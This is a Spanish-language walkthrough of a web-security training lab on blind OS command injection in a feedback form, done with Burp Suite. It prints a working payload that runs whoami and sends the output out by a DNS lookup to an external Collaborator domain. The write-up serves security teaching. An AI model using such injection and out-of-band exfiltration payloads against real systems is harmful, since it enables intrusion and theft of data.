Descripción
This lab contains a blind OS command injection vulnerability in the feedback function.
The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application’s response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.
To solve the lab, execute the whoami command and exfiltrate the output via a DNS query to Burp Collaborator. You will need to enter the name of the current user to complete the lab.
Blind OS command injection with out-of-band data exfiltration writeup
Entramos en el laboratorio y vamos al apartado de ‘Submit feedback’. Allí rellenaremos el formulario y capturaremos el envío con el ‘Logger’ de Burp Suite:
Llevaremos esta petición al ‘Repeater’ con Ctrl + R o Clcik derecho -> Send to Repeater. También iremos a la pestaña ‘Collaborator’, pulsaremos ‘Get Started’ y ‘Copy to clipboard. Guardaremos el valor del portapapeles, en mi caso ‘en5f7u165sjxqednkiuhgtsai1otcj08.oastify.com’.
En el ‘Repeater’, inyectaremos el siguiente comando:
||nslookup `whoami`.en5f7u165sjxqednkiuhgtsai1otcj08.oastify.com||
Este comando enviará una petición a nuestro servidod. Al subdominio con el nombre de usuario que nos pide el laboratorio.
Codificaremos el comando como URL con Ctrl + U y enviaremos la petición. En el ‘Collaborator’, al pulsar ‘Poll now’, deberá aparecer la siguiente información:
Indicando que se nos ha hecho una petición de DNS lookup, al subdominio ‘peter-3eeVmf’. Volveremos al navegador. Iremos a ‘Submit solution’ y enviaremos el usuario, completando así el laboratorio:
